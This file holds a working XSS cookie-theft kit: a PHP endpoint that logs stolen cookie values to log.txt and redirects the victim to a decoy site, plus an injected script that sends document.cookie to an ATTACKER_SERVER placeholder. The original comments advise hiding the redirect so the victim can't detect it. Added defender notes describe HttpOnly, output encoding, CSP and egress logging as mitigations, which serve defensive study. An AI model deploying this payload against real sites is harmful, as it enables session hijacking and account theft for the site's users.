// Upload/Save this file on ATTACKER_SERVER cookiestealer.php //
// change this google.com to same website, which you are attacking, so that Victim can't detect. //
// The captured cookie values are appended to log.txt, in the same directory as this file. //
<?php
// Receiving end of an XSS cookie-exfiltration demo: it takes the value passed
// in the `c` query parameter and appends it to a local file, then redirects
// the browser away.
//
// Defender notes:
//  - The value arrives in the query string of a plain GET request, so it shows
//    up in proxy, egress and web-server logs as a request to an unfamiliar
//    host carrying cookie names and values.
//  - Only cookies readable from script reach this endpoint; session cookies
//    set with the HttpOnly attribute are not exposed through document.cookie.
//  - The root cause is the XSS injection point itself: context-aware output
//    encoding of user-controlled data removes it, and a Content-Security-Policy
//    that disallows inline scripts keeps an injected inline <script> from running.

// Send a redirect so the browser lands on another site after the request.
header ('Location:https://google.com');
// Raw, unvalidated value of the `c` query parameter.
$cookies = $_GET["c"];
// Open log.txt in append mode, so earlier entries are kept.
$file = fopen('log.txt', 'a');
// One entry per request, followed by a blank line as separator.
fwrite($file, $cookies . "\n\n");
?>
// Payload to inject into XSS //
// replace ATTACKER_SERVER by real URL or IP //
<script type="text/javascript">
// Navigates the whole page to the collection endpoint, appending the string
// returned by document.cookie as the `c` query parameter.
// Defender notes: document.cookie never includes cookies marked HttpOnly, so
// setting HttpOnly on session cookies keeps them out of this request. The
// navigation is a top-level page load over plain http, which is visible to the
// user and to egress/proxy logging. This block only runs if the application
// reflects or stores it unencoded; output encoding and a CSP without
// 'unsafe-inline' both stop it from executing.
document.location='http://ATTACKER_SERVER/cookiestealer.php?c='+document.cookie;
</script>